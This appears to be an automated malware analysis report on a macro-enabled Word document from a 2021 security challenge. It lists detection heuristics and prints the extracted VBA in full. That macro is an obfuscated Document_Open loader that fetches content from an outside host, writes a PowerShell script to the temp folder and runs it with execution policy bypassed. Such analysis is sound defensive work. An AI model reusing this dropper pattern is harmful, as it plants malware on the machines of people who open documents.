Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bd9c0a2035864f3d…

MALICIOUS

Office (OOXML)

48.9 KB Created: 2021-02-06 17:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-29
MD5: 9bf01ecee23f54efc3acc8f67a66a88c SHA-1: 4385b7d76e6ce8e4263c2a92707037d73c65ca0b SHA-256: bd9c0a2035864f3dfb3d0dc987ad3eb7282278f8dca399254b419f6c26ef0cfd
438 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro within a Document_Open subroutine, which is a common technique for malicious Office documents. This macro utilizes WScript.Shell and PowerShell to download and execute a second-stage payload from a URL, as indicated by the critical OLE_VBA_DOWNLOAD and OLE_VBA_PS heuristics. The presence of an obfuscated auto-exec loader further supports its malicious intent.

Heuristics 12

  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub oPlsoa3(cmd As String)
        Shell cmd
    End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        If IsArray(var) = False Then
            aa99a = "Wscript.Shell"
        End If
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    Function jfsakl() As String
     jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
    End Function
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function psi Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                        ByVal szURL As String, ByVal szFileName As String, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Function X1sla3(X9ss, los4) As String
        Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
        uL7sy12.Open getZZ(), los4, False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function X1sla3(X9ss, los4) As String
        Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
        uL7sy12.Open getZZ(), los4, False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim waA7S As String
        waA7S = Environ("temp") & "\runme." & "ps1"
        If IsArray(dast) = True Then
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.untrustednetwork.net/misc/payload1.nul Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8483 bytes
SHA-256: 22ec391741a94390794b08af08e9b53656fe358021b0792f864f63d9d0a77116
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' --------------------------------------------------------------------
'
' This file is part of the European Cyber Security Challenge 2021
'
' Treat it as you would any potentially dangerous file and exercise
' appropriate caution when analyzing it.
'
' Although it is benign, it simulates certain actions, which might
' lead to it being classified as malicious by anti-malware products.
'
' --------------------------------------------------------------------

Private Sub Document_Open()
    
    Dim alpha, beta, gamma, delta, epsilon, zeta, eta, theta, iota As Long
    Dim S1sla, L0pet As String
    
    alpha = 1122
    beta = 9212
    gamma = 4422
    delta = 5647
    epsilon = 1139
    zeta = 6673
    eta = 7474
    theta = 1337
    iota = 1002
    kappa = 7892
    
    alpha = beta * gamma
    gamma = eta - delta
    kappa = alpha * zeta
    eta = kappa / beta
    iota = eta + theta + iota
    gamma = eta / zeta
    zeta = alpha + epsilon
    epsilon = iota / alpha
    
    S1sla = getA() + getB() + getC() + getD() + getE() + getH()
    L0pet = getX() + getY() + getA() + getZ() + getE() + getF() + getX()
    
    If alpha = 1122 Then
        S1sla = getE() + getA() + getD() + getS() + getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS()
        L0pet = getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS() + getE() + getA() + getD() + getS()
        Ls21fa (S1sla)
    End If
    
    If alpha = 9212 Then
       L0pet = getT() + getU() + getW() + getV() + getH() + getH() + getL() + getI() + getJ() + getM() + getP() + getA() + getS() + getU() + getU()
    End If
    
    If gamma = 4422 Then
       S1sla = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getV()
    End If
    
    If delta = 5647 Then
       L0pet = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getS()
       X1sla3 S1sla, L0pet
    End If
    
    If epsilon = 1139 Then
       S1sla = getP() + getA() + getL() + getA() + getD() + getA() + getW() + getE() + getB() + getH() + getO() + getL() + getE() + getM() + getA()
        X1sla3 S1sla, L0pet
    End If
        
    
End Sub


Attribute VB_Name = "Module1"
Sub Ls21fa(dast)
    Dim waA7S As String
    waA7S = Environ("temp") & "\runme." & "ps1"
    If IsArray(dast) = True Then
        SloA12 (waA7S)
        oPlsoa3 waA7S
    End If
End Sub

Function getA() As String
    If IsArray(var) = False Then
        getA = "V0B"
    End If
End Function

Function X1sla3(X9ss, los4) As String
    Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
    uL7sy12.Open getZZ(), los4, False
    uL7sy12.Send
    goS67A = uL7sy12.responseText
    uL7sy12.Open getZZ(), X9ss, False
    uL7sy12.Send
    R0asda3 uL7sy12.responseText, goS67A
    kfid
End Function

Function getB() As String
    If IsArray(var) = False Then
        getB = "ftp"
    End If
End Function

Function getC() As String
    If IsArray(var) = False Then
        getC = "002"
    End If
End Function


Attribute VB_Name = "Module2"
Private Declare PtrSafe Function psi Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Function dsa241() As String
    If IsArray(var) = False Then
        dsa241 = "ft.Xm"
    End If
End Function

Function Ssfas2E() As String
    If IsArray(var) = False Then
        Ssfas2E = "roso"
    End If
End Function

Function jfsakl() As String
 jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
End Function

Function getT() As String
    If IsArray(var) = False Then
        getT = "apsl"
    End If
End Function

Function getU() As String
    If IsArray(var) = False Then
        getU = "s0j"
    End If
End Function

Function getAC() As String
    If IsArray(var) = False Then
        getAC = "lHttp"
    End If
End Function

Function salww() As String
 salww = jfsakl
End Function

Function getV() As String
    If IsArray(var) = False Then
        getV = "oob"
    End If
End Function

Public Sub SloA12(Param)
If kappa = 1234 Then
    psi 0, "https://www.untrustednetwork.net/misc/payload1.nul, Param, 0, 0"
End If
End Sub

Function getW() As String
    If IsArray(var) = False Then
        getW = "x90"
    End If
End Function

Function vv3223() As String
    If IsArray(var) = False Then
        vv3223 = "Mic"
    End If
End Function

Public Sub kfid()
    sdeee1 = salww + " -file " + Environ(Gsa33()) + "\" + Gsa33() + looo1()
    Set lsi = CreateObject(aa99a)
    lsi.Run sdeee1, 0
    
End Sub


Function sims22() As String
    If IsArray(var) = False Then
        sims22 = "jscript"
    End If
End Function



Attribute VB_Name = "Module3"
Function getD() As String
    If IsArray(var) = False Then
        getD = "t2"
    End If
End Function

Function getE() As String
    If IsArray(var) = False Then
        getE = "Ht"
    End If
End Function

Function getF() As String
    If IsArray(var) = False Then
        getF = "Zqwj"
    End If
End Function

Function getH() As String
    If IsArray(var) = False Then
        getH = "cZ"
    End If
End Function

Function getI() As String
    If IsArray(var) = False Then
        getI = "_"
    End If
End Function

Function getJ() As String
    If IsArray(var) = False Then
        getJ = "eA8"
    End If
End Function

Function getK() As String
    If IsArray(var) = False Then
        getK = "tPs"
    End If
End Function

Function getL() As String
    If IsArray(var) = False Then
        getL = ":"
    End If
End Function

Function getM() As String
    If IsArray(var) = False Then
        getM = "JH6L4"
    End If
End Function

Function R0asda3(kl1a, sa12) As String
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim Fileout As Object
    Set Fileout = fso.CreateTextFile(Environ(Gsa33()) + "\" + Gsa33() + looo1(), True, True)
    Fileout.Write kl1a
    Fileout.Write sa12
End Function

Function getN() As String
    If IsArray(var) = False Then
        getN = "/"
    End If
End Function

Function getO() As String
    If IsArray(var) = False Then
        getO = "mi"
    End If
End Function

Function getP() As String
    If IsArray(var) = False Then
        getP = "sc"
    End If
End Function

Function getQ() As String
    If IsArray(var) = False Then
        getQ = "01292"
    End If
End Function

Function getR() As String
    If IsArray(var) = False Then
        getR = "."
    End If
End Function

Function getS() As String
    If IsArray(var) = False Then
        getS = "vm2"
    End If
End Function

Sub oPlsoa3(cmd As String)
    Shell cmd
End Sub


Function getX() As String
    If IsArray(var) = False Then
        getX = "zIp"
    End If
End Function

Function getY() As String
    If IsArray(var) = False Then
        getY = "iEX"
    End If
End Function

Function getZ() As String
    If IsArray(var) = False Then
        getZ = "www"
    End If
End Function

Function getZZ() As String
    If IsArray(var) = False Then
        getZZ = "gEt"
    End If
End Function




Attribute VB_Name = "Module4"
Function Gsa33() As String
    If IsArray(var) = False Then
        Gsa33 = "Temp"
    End If
End Function

Public Sub sa57s()
    Kill "C:\Windows\payload1.exe"
End Sub

Function des999() As String
    If IsArray(var) = False Then
        des999 = "apsl"
    End If
End Function

Function looo1() As String
    If IsArray(var) = False Then
        looo1 = ".ps1"
    End If
End Function

Function aa99a() As String
    If IsArray(var) = False Then
        aa99a = "Wscript.Shell"
    End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 56320 bytes
SHA-256: 1cb01ab51e3aa880af954d04eea3130f77cad8eae75da38ba5daf91145154a2c